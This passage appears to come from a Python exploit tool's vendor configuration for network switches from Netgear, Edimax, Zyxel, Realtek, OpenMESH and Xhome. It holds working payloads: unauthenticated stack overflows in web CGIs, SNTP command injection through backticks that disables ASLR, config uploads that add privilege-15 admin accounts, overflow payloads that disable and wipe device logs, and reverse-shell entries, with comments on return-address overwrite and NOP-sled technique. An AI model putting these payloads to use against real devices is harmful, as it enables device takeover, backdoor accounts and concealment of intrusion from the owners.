    							'description':'Stack overflow in "switch_type/sys_hardver" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'switch_type='+ self.random_string(116) +'&sys_hardver=31337&sys_macaddr=DE:AD:BE:EF:13:37&sys_serialnumber=DE:AD:BE:EF:13:37&password=tgnetadmin',
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
    						'authenticated': False,
    						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
    						'vulnerable': True,
    						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
    					'priv15_account': {
    						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
    						'vulnerable': True,
    						'safe': True
    					'sntp': {
    						'description':'SNTP command injection (PoC: disable ASLR)',
    						'authenticated': True,
    						'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
    						'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
    						'vulnerable': True,
    						'safe': True
    					# The stack overflow in 'username' and 'password' at same request are multipurpose.
    					# The trick to jump and execute:
    					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
    					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
    					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
    					# 4. We will also feed required function parameters, by adding them to '_CMD_'
    					'stack_cgi_diag': {
    						'vulnerable': False,
    					'stack_cgi_log': {
    						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
    						'authenticated': False,
    						'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
    						'log_settings_set_cmd':'&LOGGING_SERVICE=0',			# Disable Logging CMD
    						'log_settings_set_SIGSEGV':True,						# Disable Logging SIGSEGV ?
    						'log_ramClear_cmd':'',									# Clean RAM log CMD
    						'log_ramClear_SIGSEGV':False,							# Clean RAM log SIGSEGV ?
    						'log_fileClear_cmd':'',									# Clean FILE log CMD
    						'log_fileClear_SIGSEGV':False,							# Clean FILE log SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_sntp': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
    						'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',
    						'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',
    						'sys_timeSettings_set_SIGSEGV': False,		# SIGSEGV ?
    						'workaround':True,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
    					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
    					'heack_cgi_shell': {
    						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
    						'authenticated': False,
    						'workaround':False,	# My LAB workaround
    						#'stack':False, # False = use Heap, and there are no ASLR
    						'stack':True, # False = use Heap, and there are no ASLR
    						'vulnerable': True,
    						'safe': True
    			'Netgear': { 
    				'vendor': 'NETGEAR Inc.',
    				'login': {
    					'description':'Login/Logout on remote device',
    					'authenticated': True,
    					'vulnerable': False,
    					'safe': True
    						'description':'Disable and clean logs',
    						'authenticated': True,
    						'vulnerable': False,
    						'safe': True
    				# Verify lacking authentication
    				'verify': { 
    						'set.cgi': { # 'username' also suffer from stack overflow
    							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
    						'authenticated': False,
    						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
    						'vulnerable': True,
    						'safe': True # Boa/Hydra restart/watchdog, False = no restart, True = restart
    					'priv15_account': {
    						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'content':'Content-Type\n\nconfig-file-header\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
    						'vulnerable': False,
    						'safe': True
    					'sntp': {
    						# Most probably it is vulnerable
    						'description':'SNTP command injection (PoC: disable ASLR)',
    						'authenticated': True,
    						'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
    						'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
    						'vulnerable': False,
    						'safe': True
    					# The stack overflow in 'username' and 'password' at same request are multipurpose.
    					# The trick to jump and execute:
    					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
    					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
    					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
    					# 4. We will also feed required function parameters, by adding them to '_CMD_'
    					'stack_cgi_diag': {	# Not vulnerable 
    						'vulnerable': False,
    					'stack_cgi_log': {
    						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
    						'authenticated': False,
    						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
    						'log_settings_set_cmd':'',					# Disable Logging CMD
    						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
    						'log_ramClear_cmd':'',						# Clean RAM CMD
    						'log_ramClear_SIGSEGV':True,				# Clean RAM SIGSEGV ?
    						'log_fileClear_cmd':'',						# Clean FILE log CMD
    						'log_fileClear_SIGSEGV':True,				# Clean FILE log SIGSEGV ?
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()
    						'log_settings_set':0x00,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()
    						'log_ramClear':0x00,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
    														# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()
    						'log_fileClear':0x00,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
    						'workaround':False,	# My LAB workaround
    						'vulnerable': False,
    						'safe': True
    					'stack_cgi_sntp': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
    						'sys_timeSntp_set_cmd':'&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123',
    						'sys_timeSntp_set_check':'&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123',
    						'sys_timeSntpDel_set_cmd':'&sntpServer=+&cursntpPort=139',				# CMD
    						'sys_timeSettings_set_cmd_enable':'&sntpStatus=1',	# Enable CMD
    						'sys_timeSettings_set_cmd_disable':'&sntpStatus=0',	# Disable CMD
    						'sys_timeSettings_set_SIGSEGV': True,		# SIGSEGV ?
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()
    						'sys_timeSntp_set':0x00,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()
    						'sys_timeSntpDel_set':0x00,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
    														# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()
    						'sys_timeSettings_set':0x00,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
    						'workaround':False,	# My LAB workaround
    						'vulnerable': False,
    						'safe': True
    					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
    					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
    					'heack_cgi_shell': {
    						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
    						'authenticated': False,
    						'stack':True, # False = use Heap, and there are no ASLR
    						'cgi':'set.cgi',				# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
    						'START':0x00,				# start: Stack overflow RA, used for searching NOP sled by blind jump
    						'STOP':0x00,				# end: You may want to play with this if you dont get it working
    						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
    						'pwd_nop': 77,					# filler/garbage (not used for something constructive)
    						'align': 3,						# Align opcodes in memory
    						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
    						'workaround':False,	# My LAB workaround
    						'vulnerable': False,
    						'safe': True
    			'Edimax': { 
    				'vendor': 'EDIMAX Technology Co., Ltd.',
    				'login': {
    					'description':'Login/Logout on remote device',
    					'authenticated': True,
    					'vulnerable': True,
    					'safe': True
    						'description':'Disable and clean logs',
    						'authenticated': True,
    						'vulnerable': True,
    						'safe': True
    				# Verify lacking authentication
    				'verify': { 
    							'authenticated': False,
    							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
    							'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)
    							'content_check':'Copy: Illegal software format',
    							'vulnerable': True,
    							'safe': True
    						'login.cgi': {
    							'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
    							'authenticated': False,
    							'check_uri':'/tmp/VUL.TXT', # We cannot control the content...
    							'content':'{"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1":{}}',
    							'vulnerable': True,
    							'safe': True
    						'set.cgi': { # 'username' also suffer from stack overflow
    							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
    						'authenticated': False,
    						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
    						'vulnerable': True,
    						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
    					'priv15_account': {
    						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
    						#'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" nopassword\n\n------', # Yep, working too
    						'vulnerable': True,
    						'safe': True
    					'sntp': {
    						'description':'SNTP command injection (PoC: disable ASLR)',
    						'authenticated': True,
    						'inject_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1":{}}',
    						'check_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1":{}}',
    						'vulnerable': True,
    						'safe': True
    					# The stack overflow in 'username' and 'password' at same request are multipurpose.
    					# The trick to jump and execute:
    					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
    					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
    					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
    					# 4. We will also feed required function parameters, by adding them to '_CMD_'
    					'stack_cgi_diag': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
    						'sys_ping_post_SIGSEGV': True,		# SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_log': {
    						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
    						'authenticated': False,
    						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
    						#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',	# Enable Logging CMD
    						'log_settings_set_cmd':'&empty=1',			# Disable Logging CMD
    						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
    						'log_ramClear_cmd':'&target=0',				# Clean RAM CMD
    						'log_ramClear_SIGSEGV':True,				# Clean RAM SIGSEGV ?
    						'log_fileClear_cmd':'&target=1',			# Clean FILE log CMD
    						'log_fileClear_SIGSEGV':True,				# Clean FILE log SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_sntp': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
    						'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&dlsType=0',
    						'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&dlsType=0',
    						'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139&dlsType=0',				# CMD
    						'sys_timeSettings_set_cmd_enable':'&sntp=1',	# Enable CMD
    						'sys_timeSettings_set_cmd_disable':'&sntp=0',	# Disable CMD
    						'sys_timeSettings_set_SIGSEGV': True,		# SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
    					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
    					'heack_cgi_shell': {
    						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
    						'authenticated': False,
    						'stack':True, # False = use Heap, and there are no ASLR
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    			'Zyxel': {
    				'vendor': 'Zyxel Communications Corp.',
    				'login': {
    					'description':'Login/Logout on remote device',
    					'authenticated': True,
    					'vulnerable': False,
    					'safe': True
    						'description':'Disable and clean logs',
    						'authenticated': True,
    						'vulnerable': True,
    						'safe': True
    				# Verify lacking authentication
    				'verify': {
    						'dispatcher.cgi': { # 'username' also suffer from heap overflow
    							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'username='+ self.random_string(112) + '&password='+ self.random_string(60) + '&STARTUP_BACKUP=1',
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
    						'authenticated': False,
    						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
    						'vulnerable': True,
    						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
    					'priv15_account': {
    						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
    						#'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" nopassword\n\n------', # Yep, working too
    						'vulnerable': False,
    						'safe': True
    					'sntp': {
    						'description':'SNTP command injection (PoC: disable ASLR)',
    						'authenticated': True,
    						'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
    						'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
    						'vulnerable': False,
    						'safe': True
    					# The stack overflow in 'username' and 'password' at same request are multipurpose.
    					# The trick to jump and execute:
    					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
    					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
    					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
    					# 4. We will also feed required function parameters, by adding them to '_CMD_'
    					'stack_cgi_diag': {	# Not vulnerable 
    						'vulnerable': False,
    					'stack_cgi_add_account': {
    						'description':'Stack overflow in "username/password" (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_del_account': {
    						'description':'Stack overflow in "username/password" (PoC: del priv 15 credentials)',
    						'authenticated': False,
    						'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_log': {
    						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
    						'authenticated': False,
    						'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',
    						'log_settings_set_cmd':'&LOGGING_SERVICE=0',			# Disable Logging CMD
    						'log_settings_set_SIGSEGV':False,						# Disable Logging SIGSEGV ?
    						'log_ramClear_cmd':'&_del=0',	# Clean RAM log CMD
    						'log_ramClear_SIGSEGV':False,							# Clean RAM log SIGSEGV ?
    						'log_fileClear_cmd':'&_del=1',		# Clean FILE log CMD
    						'log_fileClear_SIGSEGV':False,							# Clean FILE log SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_sntp': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',
    						'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',
    						'sys_timeSettings_set_SIGSEGV': False,		# SIGSEGV ?
    						'workaround':True,	# My LAB workaround
    						'vulnerable': False,
    						'safe': True
    					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
    					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
    					'heack_cgi_shell': {
    						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
    						'authenticated': False,
    						'workaround':False,	# My LAB workaround
    						'stack':True, # False = use Heap, and there are no ASLR
    						'vulnerable': True,
    						'safe': True
    			'Realtek': {
    				'vendor': 'Realtek',
    				'login': {
    					'description':'Login/Logout on remote device',
    					'authenticated': True,
    					'vulnerable': True,
    					'safe': True
    						'description':'Disable and clean logs',
    						'authenticated': True,
    						'vulnerable': True,
    						'safe': True
    				# Verify lacking authentication
    				'verify': {
    							'authenticated': False,
    							'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
    							'content_check':' Invalid config file!!', # one 0x20 in beginning
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
    							'content_check':' Invalid config file!!', # one 0x20 in beginning
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
    							'content_check':' Invalid config file!!', # one 0x20 in beginning
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
    							'content_check':'Image Signature Error',
    							'vulnerable': True,
    							'safe': True
    						'dispatcher.cgi': { # 'username' also suffer from stack overflow
    							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'username=admin&password='+ self.random_string(184) + '&login=1',
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
    						'authenticated': False,
    						'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory
    						'vulnerable': True,
    						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
    					'priv15_account': {
    						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
    						'vulnerable': True,
    						'safe': True
    					'sntp': {
    						'description':'SNTP command injection (PoC: disable ASLR)',
    						'authenticated': True,
    						'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
    						'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
    						'vulnerable': True,
    						'safe': True
    					# The stack overflow in 'username' and 'password' at same request are multipurpose.
    					# The trick to jump and execute:
    					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
    					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
    					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
    					# 4. We will also feed required function parameters, by adding them to '_CMD_'
    					'stack_cgi_diag': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'&login=1&_CMD_',
    						'sys_ping_post_SIGSEGV': False,		# SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_log': {
    						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
    						'authenticated': False,
    						'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
    						'log_settings_set_cmd':'&LOGGING_SERVICE=0',# Disable Logging CMD
    						'log_settings_set_SIGSEGV':False,			# Disable Logging SIGSEGV ?
    						'log_ramClear_cmd':'',						# Clean RAM log CMD
    						'log_ramClear_SIGSEGV':False,				# Clean RAM log SIGSEGV ?
    						'log_fileClear_cmd':'',						# Clean FILE log CMD
    						'log_fileClear_SIGSEGV':False,				# Clean FILE log SIGSEGV ?
    						'workaround':True,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_sntp': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
    						'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',
    						'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=139',
    						'sys_timeSettings_set_SIGSEGV': False,		# SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': False,
    						'safe': True
    					# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.
    					# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode
    					'heack_cgi_shell': {
    						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
    						'authenticated': False,
    						'workaround':True,	# My LAB workaround
    						'stack':True, # False = use Heap, and there are no ASLR
    						'vulnerable': True,
    						'safe': True
    			'OpenMESH': { 
    				'vendor': 'Open Mesh, Inc.',
    				'login': {
    					'description':'Login/Logout on remote device',
    					'authenticated': True,
    					'vulnerable': False,
    					'safe': True
    				'login': {
    					'description':'Login/Logout on remote device',
    					'authenticated': True,
    					'vulnerable': False,
    					'safe': True
    						'description':'Disable and clean logs',
    						'authenticated': True,
    						'vulnerable': False,
    						'safe': True
    				# Verify lacking authentication
    				'verify': { 
    						'security.cgi': { # 'username' also suffer from stack overflow
    							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'usr=admin&pswrd=' + self.random_string(280),
    							'vulnerable': True,
    							'safe': True
    						'datajson.cgi': { # 'username' also suffer from stack overflow
    							'description':'Stack overflow in "username/password" (PoC: crash CGI)',
    							'authenticated': False,
    							'content':'usr=admin&pswrd=' + self.random_string(288),
    							'vulnerable': True,
    							'safe': True
    				'exploit': {
    					'heack_hydra_shell': {
    						'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
    						'authenticated': False,
    						'uri':'/cgi-bin/sn_httpupload.cgi?', # Including alignment of opcodes in memory
    						'vulnerable': True,
    						'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart
    					'priv15_account': {
    						'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'vulnerable': False,
    						'safe': True
    					'sntp': {
    						'description':'SNTP command injection (PoC: disable ASLR)',
    						'authenticated': True,	# <================================
    						'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
    						'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
    						'vulnerable': True, # It is vulnerable, but I am not using this authenticated code here :>
    						'safe': True
    					# The stack overflow in 'username' and 'password' at same request are multipurpose.
    					# The trick to jump and execute:
    					# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]
    					# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary
    					# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)
    					# 4. We will also feed required function parameters, by adding them to '_CMD_'
    					# Bonus: Disable and clean logs
    					'stack_cgi_add_account': {
    						'description':'Stack overflow in "username/password" (PoC: add priv 15 credentials)',
    						'authenticated': False,
    						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_del_account': {
    						'description':'Stack overflow in "username/password" (PoC: del priv 15 credentials)',
    						'authenticated': False,
    						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_diag': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_log': {
    						'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
    						'authenticated': False,
    						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
    						'log_settings_set_cmd':'&en=0',				# Disable Logging CMD
    						'log_settings_set_SIGSEGV':True,			# Disable Logging SIGSEGV ?
    						'log_ramClear_cmd':'&ta=0',					# Clean RAM CMD
    						'log_ramClear_SIGSEGV':True,				# Clean RAM SIGSEGV ?
    						'log_fileClear_cmd':'&ta=1',				# Clean FILE log CMD
    						'log_fileClear_SIGSEGV':True,				# Clean FILE log SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					'stack_cgi_sntp': {
    						'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
    						'authenticated': False,
    						'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
    						'sys_timeSntp_set_cmd':'&sa=`echo 0 > /proc/sys/kernel/randomize_va_space`&sp=123',
    						'sys_timeSntp_set_check':'&sa=`cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check`&sp=123',
    						'sys_timeSntpDel_set_cmd':'&sa=+&sp=123',				# CMD
    						'sys_timeSettings_set_cmd_enable':'&sn=1',	# Enable CMD
    						'sys_timeSettings_set_cmd_disable':'&sn=0',	# Disable CMD
    						'sys_timeSettings_set_SIGSEGV': True,		# SIGSEGV ?
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    					# Used for both 'heap' and 'stack'
    					'heack_cgi_shell': {
    						'description':'Stack overflow in "username/password" (PoC: reverse shell)',
    						'authenticated': False,
    						'stack':False, # False = use Heap, and there are no ASLR
    						'workaround':False,	# My LAB workaround
    						'vulnerable': True,
    						'safe': True
    			'Xhome': {
    				'vendor': 'Xhome',
    				'login': {
    					'description':'Login/Logout on remote device',
    					'authenticated': True,
    					'vulnerable': True,
    					'safe': True
    						'description':'Disable and clean logs',
    						'authenticated': True,
    						'vulnerable': True,
    						'safe': True
    				# Verify lacking authentication
    				'verify': {
    							'authenticated': False,
    							'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
    							'content_check':' Invalid config file!!', # one 0x20 in beginning
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
    							'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
    							'content_check':' Invalid config file!!', # one 0x20 in beginning
    							'vulnerable': True,
    							'safe': True
    							'authenticated': False,
